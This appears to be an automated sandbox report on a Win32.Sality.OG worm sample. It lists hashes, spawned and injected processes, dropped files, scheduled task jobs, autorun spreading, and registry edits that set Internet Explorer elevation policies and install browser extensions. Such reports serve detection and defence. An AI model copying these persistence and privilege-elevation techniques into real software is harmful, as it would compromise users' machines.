Win32.Sality.OG_415abb1224
Win32.Sality.OG (B) (Emsisoft), Win32.Sality.OG (AdAware), VirusSality.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)
Behaviour: Worm, Virus, WormAutorun
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: 415abb1224ff6404d48545f6388ac3ca
SHA1: 3d2d60a8ce4e5b67c30ea8079d8d257f6acc1cbf
SHA256: 4fbc2dc03f1cc6a403e08229985aff15c861b89424e9be877760b1d7d5f4ed05
SSDeep: 196608:qlZSTsr63ezVpLmpbAgMSSVDh7tpsE2jJ:2xW3ehpGbchLps/F
Size: 7070840 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: AirInstaller
Created at: 2012-12-04 15:55:02
Analyzed on: WindowsXP SP3 32-bit
Summary:
Worm. A program that primarily replicates over networks or removable drives.
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Worm's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Worm creates the following process(es):
875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe:2560
Qvalysaly.exe:2176
%original file name%.exe:1860
875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe:1180
875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe:508
WINMINE.EXE:1048
WINMINE.EXE:3776
WINMINE.EXE:544
Freeven pro-codedownloader.exe:2144
Freeven pro-codedownloader.exe:720
NOTEPAD.EXE:2288
NOTEPAD.EXE:2120
NOTEPAD.EXE:2332
NOTEPAD.EXE:556
NOTEPAD.EXE:836
NOTEPAD.EXE:2228
NOTEPAD.EXE:3472
NOTEPAD.EXE:2524
NOTEPAD.EXE:2604
NOTEPAD.EXE:3804
NOTEPAD.EXE:2896
NOTEPAD.EXE:3944
NOTEPAD.EXE:1136
NOTEPAD.EXE:3852
NOTEPAD.EXE:2152
NOTEPAD.EXE:296
NOTEPAD.EXE:2516
NOTEPAD.EXE:2188
NOTEPAD.EXE:3896
netsh.exe:2816
netsh.exe:872
notepad.exe:2056
regsvr32.exe:2376
Freeven pro-bg.exe:2444
The Worm injects its code into the following process(es):
netsh.exe:3068
Explorer.EXE:884
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process Qvalysaly.exe:2176 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\update[1].json (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\72.js (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\background.js (429 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\manifest.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\93.js (793 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\1.js (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\104.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\ExecDos.dll (5 bytes)
%Program Files%\Freeven pro\background.html (729 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\md5dll.dll (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-4.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\extension.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\182.js (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\47.js (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\14.js (784 bytes)
%Program Files%\Freeven pro\Freeven pro-bg.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\44.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\28.js (536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\141988 (195663 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\Freeven pro\utils.exe (68126 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\46.js (2 bytes)
%Program Files%\Freeven pro\54248.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\Freeven pro\Freeven pro-codedownloader.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\223.js (453 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\42.js (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-3.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\246.js (2 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe (13122 bytes)
%Program Files%\Freeven pro\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\39.js (4 bytes)
%Program Files%\Freeven pro\360-54248.crx (1425 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\4.js (3312 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (70 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-1.job (70 bytes)
%Program Files%\Freeven pro\54248.xpi (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\207.js (1 bytes)
%WinDir%\Tasks\temp_875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins.json (12 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\103.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\244.js (501 bytes)
%Program Files%\Freeven pro\Freeven pro.ico (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils.dll (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\462018 (741774 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\17.js (2392 bytes)
%Program Files%\Freeven pro\Freeven pro-bho.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp (288023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\update.json (39 bytes)
The Worm deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\40.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\39.js (0 bytes)
%WinDir%\Tasks\temp_875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\manifest.xml (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\1.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\104.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\ExecDos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\38.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\extension.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\182.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\14.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\44.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\28.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\35.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\64.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\207.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\13.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\223.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\46.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\22.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\42.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\141988 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\246.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\103.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\94.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\21.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\91.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\242.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\177.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\4.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\43.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\191.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\78.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\2.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\userCode\background.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\36.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\184.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\37.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\45.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\41.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\244.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\update.json (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\47.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\3.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\93.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\183.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\462018 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\17.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\102.js (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\72.js (0 bytes)
The process %original file name%.exe:1860 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%WinDir%\system.ini (72 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\READER_SL.EXE (432 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Jdwqkklr.tmp (217971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Qvalysaly.exe (861462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\WrapperUtils.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rmlukm.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp (232535 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00125F9D_Rar\%original file name%.exe (53142 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\StdUtils.dll (14 bytes)
The Worm deletes the following file(s):
C:\1268b5 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\WrapperUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Jdwqkklr.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Qvalysaly.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rmlukm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\StdUtils.dll (0 bytes)
The process Freeven pro-codedownloader.exe:2144 makes changes in the file system.
The Worm creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\220[1].js (19033 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\375[1].js (679 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\195[1].js (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\set_campaign_id_m[1].js (508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\380[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\200[1].js (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\9[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\233[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\7[1].js (683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery-1_7_1_min[1].js (44457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\242[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\334[1].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\288[1].js (963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\app_code[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\42[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\281[1].js (455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\91[1].js (87921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\230[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\221[1].js (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\345[1].js (645 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\260[1].js (823 bytes)
Registry activity
The process 875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe:2560 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 70 A8 35 12 DD FA 56 E9 E9 FA B5 DB 85 9F 5A"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{974EFC85-F703-400D-9C26-E221ADA87A77}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-helper.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B8DE1ED5-AE5C-46B0-977B-DB47DDB4BEB0}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-codedownloader.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E09BE7F8-87B7-4C2F-A91B-A1AB8136E2E0}]
"AppPath" = "%Program Files%\Freeven pro"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{974EFC85-F703-400D-9C26-E221ADA87A77}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E09BE7F8-87B7-4C2F-A91B-A1AB8136E2E0}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"{11111111-1111-1111-1111-110511421148}" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ext\CLSID]
"{11111111-1111-1111-1111-110511421148}" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E09BE7F8-87B7-4C2F-A91B-A1AB8136E2E0}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-buttonutil.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1D66F07-4C64-4269-A437-CF91D56C0C8}]
"AppPath" = "%Program Files%\Freeven pro"
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{974EFC85-F703-400D-9C26-E221ADA87A77}]
"AppPath" = "%Program Files%\Freeven pro"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B8DE1ED5-AE5C-46B0-977B-DB47DDB4BEB0}]
"Policy" = "3"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1D66F07-4C64-4269-A437-CF91D56C0C8}]
"AppName" = "875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe-buttonutil64.exe"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{B8DE1ED5-AE5C-46B0-977B-DB47DDB4BEB0}]
"AppPath" = "%Program Files%\Freeven pro"
The Worm deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Internet Explorer\ApprovedExtensionsMigration]
"Timestamp"
The process Qvalysaly.exe:2176 makes changes in the system registry.
The Worm creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"DisplayVersion" = "1.34.5.4"
[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn6.tmp\extensionData\,"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"UninstallString" = "%Program Files%\Freeven pro\Uninstall.exe /fcp=1"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"Freeven pro-bg.exe" = "8000"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 28 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Freeven pro\Installer]
"BundledFirefox" = "1"
[HKCU\Software\InstalledBrowserExtensions\Freeven]
"54248" = "Freeven pro"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\InstalledBrowserExtensions\21636]
"54248" = "Freeven pro"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Freeven pro]
"CrPublisherId" = "21636"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"Policy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppPath" = "%Program Files%\Freeven pro"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21636]
"54248" = "Freeven pro"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\InstalledBrowserExtensions\21636\Status]
"Installed" = "1"
[HKCU\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{659b6120-4382-4bc8-90ac-af2cb70f13e4}]
"AppName" = "Freeven pro-bg.exe"
